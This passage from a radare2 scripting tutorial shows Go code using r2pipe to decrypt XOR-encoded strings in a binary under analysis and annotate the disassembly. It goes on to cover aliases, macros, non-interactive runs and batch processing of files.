As r2pipe’s Go implementation doesn’t support easy capture of stderr and stdout, we write this to a temporary file, which we’ll consume in the next part of the code. Had we chosen to implement the XOR decryption natively in our code, we could have avoided that, but seeing how to deal with stdout when using r2pipe and Go is a useful exercise for other scripts.

func writeCommentAtLoc(loc string) {
     readCmd := fmt.Sprintf("CCu `!cat -v /tmp/rxorb.txt | sed 's/\\(.*\\)/\"\\1\"/g'` @ %s", loc)    
     r2p.Cmd(readCmd)                                  
}

Our decoded string is now sitting in a file in /tmp. In the function above we do two things with one command: we read the string into a buffer and we write it out as a comment at the disassembly address in the file under analysis. The sed code is another work around for wrapping the string in quotes so that any special characters in the string do not get interpreted by the r2 shell when we pass it back.

func printCommentAtLoc(loc string) {
     pdCmd := fmt.Sprintf("pd 1 @ %s", loc)   // [3]
     pdStr, _ := r2p.Cmd(pdCmd)
     fmt.Println(pdStr)
}

We next implement a function that will print out the disassembly along with the commented string to the r2 prompt. At [3], the “pd 1” command tells r2 to print one line of disassembly from the given address.

Finally, we implement our main() function that will call all this code as well as handle cleaning up the temporary file now that we’re done.

func main() {
     key := "0x30"
     addr, err := r2p.Cmd("s") 			// [4] 's' = return current address
     check(err)
     decryptStrAtLoc(addr, key)
     writeCommentAtLoc(addr)
     printCommentAtLoc(addr)

     delCmd := fmt.Sprintf("!rm /tmp/rxorb.txt")  // clean up the temp file
     r2p.Cmd(delCmd)
     if err != nil {
     	 fmt.Println(err)
     }
     defer r2p.Close()
}

Note that at [4], due to the simplicity of the command, we just supplied the command directly to r2p.Cmd rather than format a separate string. The entire script can be found here.

Using the Script

To use the script, build the decode.go program and take a note of the output path. Open an r2 session with the target binary and at the prompt type:

#!pipe /usr/local/bin/godec/decode # change the path to suit

If you hit return now, you’ll likely see an error and then some disassembly.

The script returns an error from sed
The script returns an error from sed

That’s because we have executed the script while located at an address that does not contain any strings to consume. Let’s find an encrypted string and try again. The r2 command izz~== will output any strings in the binary that contain “==” – a common padding for base64-encoded strings.

 Executing izz~== at the r2 prompt
Executing izz~== at the r2 prompt

Let’s seek to location 0x100016bdb to test our decryption program.

We can see that our decoder has appended a comment containing the decrypted string, which looks like the beginning of a LaunchAgent or LaunchDaemon plist. Great! Let’s try again, this time feeding it all the strings that contain “==” in one go. Try this:

#!pipe /usr/local/bin/godec/decode @@=`izz~==[2]`

Here’s an example of the output:

At this point, since the #!pipe command is awkward to remember and type out every time, you might want to create an alias and/or macro for that.

$dec=#!pipe /usr/local/bin/godec/decode
(script x;  #!pipe $0)

The $dec alias allows us to call this particular script easily, while the script macro allows us to pass in any script path as an argument to the #!pipe command.

Note that we didn’t decode all encrypted strings in the binary. We could iterate over all strings (including non-encrypted ones) with something like $dec @@=`izz~cstring` but that will lead to errors. The right way to approach this would be to add code to our program that determines whether the string at the current address is a valid base64 encoded string or not. We’ll leave that as an exercise for the reader.

Our script could also do with some other improvements: passing the key as an argument would make it more reusable, and of course, there are many points where we lazily use r2 to shell out rather than using Go’s own os package, but for now, this simple script will handle the job it was intended for and is simple to repurpose or build on.

Running a Script Without an Interactive radare2 Prompt

Sometimes you just need to run a script and get the results without needing an interactive r2 prompt. You can tell r2 to execute a script on a binary, either before or after loading the binary, with the -i and -I flags, respectively. The -q option will tell r2 to quit after running the script.

r2 -Iq <script file> <binary>

You can also do the same thing with commands, aliases and macros directly without using a script, using the -c option. For example, this will print out the result of the meta macro without leaving you in an r2 session:

r2 -qc ".(meta)" /bin/ls

Batch Processing Files with a radare2 Script

If you want to process a number of files without having to start an r2 session for each one, you can pass the file path to your script as an argument when you call r2pipe as follows:

func main() {
	args := os.Args
	if len(args) < 2 || len(args) > 2 {
		fmt.Printf("Usage: Provide path to a binary.")
		os.Exit(1)
	}

	argPath := os.Args[1]
	r2p, err := r2pipe.NewPipe(argPath)
	check(err)
	defer r2p.Close()
	r2p.Cmd("aaa") // run analysis
 	
	// do your stuff
	// write results to file or stdout
}

You can now process all files in a folder from the command line with something like:

% for i in ./*; do my_r2pipe_script $i; done 

Conclusion

In this post, we’ve learned a number of useful skills. We’ve seen how to automate tasks like grabbing disassembly, adding comments, and decoding strings, and we have navigated some of the complexities of dealing with stdout when using Go to drive r2pipe.

We’ve looked at how to pass file paths as arguments and how to run scripts, commands and macros without opening an interactive radare2 session. With a good understanding of the r2 commands explored throughout this series, you should now be able to readily adapt these skills to other automation tasks.

References and Further Reading

R2pipe – The Official Radare2 Book
Radare2-r2pipe-api repository
Radare2 Python Scripting
Automating RE Using r2pipe
Decrypting Mirai configuration With radare2
Running r2Pipe Python in batch
Scripting r2 with Pipes

❌
❌